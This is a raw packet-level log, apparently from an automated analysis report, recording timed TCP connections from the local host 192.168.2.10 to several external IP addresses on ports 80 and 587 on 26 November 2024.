                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.560360909 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.560378075 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.560405016 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.599399090 CET8050033165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.603286982 CET5003380192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.603490114 CET5003380192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.603517056 CET5003380192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.604929924 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.604990959 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.688374043 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.688440084 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.724395990 CET8050033165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.724407911 CET8050033165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.725447893 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.725507021 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.808373928 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.808432102 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.086076975 CET8050032208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.158560038 CET5003280192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.159147978 CET5003480192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.179182053 CET5875002551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.220065117 CET50025587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.278911114 CET8050032208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.278999090 CET5003280192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.279011965 CET8050034208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.279191971 CET5003480192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.282088041 CET5003480192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.282118082 CET5003480192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.402004004 CET8050034208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.402013063 CET8050034208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.906814098 CET8050033165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.909790993 CET5003380192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:56.909827948 CET5003380192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.030999899 CET8050033165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.031014919 CET8050033165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.322197914 CET8050033165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.387952089 CET5003380192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.448985100 CET8050034208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.575356960 CET5003480192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.750399113 CET5003580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.872140884 CET805003513.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.875320911 CET5003580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.875519991 CET5003580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.875581026 CET5003580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.897103071 CET5003680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.996184111 CET805003513.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.996197939 CET805003513.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:58.017275095 CET805003654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:58.017522097 CET5003680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:58.017720938 CET5003680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:58.017738104 CET5003680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:58.139523029 CET805003654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:58.139539003 CET805003654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:59.463737965 CET805003654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:59.463769913 CET805003654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:59.463932991 CET5003680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:59.475445032 CET5003680192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:59.595482111 CET805003654.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:59.976989985 CET805003513.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:59.978884935 CET5003580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:59.991283894 CET805003513.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:59.991339922 CET5003580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.111685038 CET805003513.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.133080959 CET5001980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.133403063 CET5003780192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.154975891 CET5003880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.253318071 CET8050037208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.253370047 CET8050019208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.253412962 CET5003780192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.253467083 CET5001980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.254658937 CET5003780192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.254739046 CET5003780192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.275979996 CET805003844.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.276220083 CET5003880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.276310921 CET5003880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.276422024 CET5003880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.374558926 CET8050037208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.374584913 CET8050037208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.396411896 CET805003844.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.396424055 CET805003844.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.376210928 CET805003844.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.376384020 CET805003844.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.376475096 CET5003880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.376622915 CET5003880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.423175097 CET8050037208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.425856113 CET5003780192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.425915956 CET5003780192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.496479034 CET805003844.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.548027992 CET8050037208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.548058987 CET8050037208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.556490898 CET5003980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.676578045 CET805003954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.676737070 CET5003980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.682318926 CET5003980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.683294058 CET5003980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.770710945 CET8050037208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.802320004 CET805003954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.803483963 CET805003954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.887923002 CET5003780192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:02.638993979 CET5004080192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:02.761750937 CET805004034.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:02.762487888 CET5004080192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:02.762713909 CET5004080192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:02.762759924 CET5004080192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:02.882637024 CET805004034.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:02.882667065 CET805004034.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.034835100 CET805003954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.034905910 CET805003954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.035216093 CET5003980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.035216093 CET5003980192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.155210972 CET805003954.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.214134932 CET5004180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.334120035 CET805004135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.334495068 CET5004180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.334789991 CET5004180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.334789991 CET5004180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.454792023 CET805004135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.454849005 CET805004135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.208981991 CET805004034.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.209110975 CET805004034.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.209162951 CET5004080192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.209233046 CET5004080192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.329341888 CET805004034.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.791903019 CET805004135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.792066097 CET805004135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.795325041 CET5004180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.808504105 CET5004180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.847254992 CET5004280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.928554058 CET805004135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.967536926 CET805004254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.969633102 CET5004280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.969707012 CET5004280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.969707012 CET5004280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:05.033936977 CET5004380192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:05.089811087 CET805004254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:05.089821100 CET805004254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:05.154190063 CET80500433.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:05.155435085 CET5004380192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:05.155622005 CET5004380192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:05.155622005 CET5004380192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:05.275521994 CET80500433.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:05.275549889 CET80500433.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.251966000 CET80500433.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.251990080 CET80500433.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.252077103 CET5004380192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.252156973 CET5004380192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.372164011 CET80500433.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.419820070 CET805004254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.419945955 CET805004254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.420000076 CET5004280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.420063972 CET5004280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.421945095 CET5004480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.541711092 CET805004254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.543661118 CET8050044165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.543760061 CET5004480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.545288086 CET5004480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.545353889 CET5004480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.665261984 CET8050044165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.665275097 CET8050044165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:07.014410019 CET5004580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:07.134432077 CET805004518.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:07.138082027 CET5004580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:07.138751984 CET5004580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:07.138919115 CET5004580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:07.258794069 CET805004518.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:07.258873940 CET805004518.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:07.936511040 CET8050044165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:07.953978062 CET5004480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:07.954432011 CET5004680192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:08.074405909 CET8050046165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:08.074500084 CET5004680192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:08.074517012 CET8050044165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:08.074573994 CET5004480192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:08.074959993 CET5004680192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:08.075006008 CET5004680192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:08.197068930 CET8050046165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:08.197086096 CET8050046165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.211065054 CET805004518.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.211224079 CET805004518.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.212951899 CET5004580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.212951899 CET5004580192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.332534075 CET8050046165.160.15.20192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.333048105 CET805004518.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.482280970 CET5004680192.168.2.10165.160.15.20
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.505943060 CET5004780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.626064062 CET805004754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.626169920 CET5004780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.626559973 CET5004780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.626615047 CET5004780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.747051954 CET805004754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.747060061 CET805004754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:10.015747070 CET5004880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:10.135937929 CET805004818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:10.136027098 CET5004880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:10.136670113 CET5004880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:10.136713982 CET5004880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:10.258080959 CET805004818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:10.258095026 CET805004818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.028804064 CET805004754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.028908968 CET805004754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.029043913 CET5004780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.029102087 CET5004780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.149091005 CET805004754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.233658075 CET5003480192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.233984947 CET5004980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.251173973 CET805004818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.251243114 CET805004818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.251295090 CET5004880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.251586914 CET5004880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.354109049 CET8050034208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.354120016 CET8050049208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.354223967 CET5003480192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.354227066 CET5004980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.354568958 CET5004980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.354594946 CET5004980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.372543097 CET805004818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.476371050 CET8050049208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.476486921 CET8050049208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.819137096 CET5005080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.939210892 CET805005044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.939352036 CET5005080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.939577103 CET5005080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.939608097 CET5005080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:12.062536001 CET805005044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:12.062550068 CET805005044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:12.525130987 CET8050049208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:12.591065884 CET5004980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:12.608966112 CET5004980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:12.609349966 CET5005180192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:12.729465961 CET8050049208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:12.729516029 CET5004980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:12.729609013 CET8050051208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:12.729671001 CET5005180192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:12.729901075 CET5005180192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:12.729923010 CET5005180192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:12.849864006 CET8050051208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:12.849874973 CET8050051208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:13.086143017 CET805005044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:13.086215019 CET805005044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:13.086270094 CET5005080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:13.086515903 CET5005080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:13.206449032 CET805005044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:13.648958921 CET5005280192.168.2.1018.141.10.107
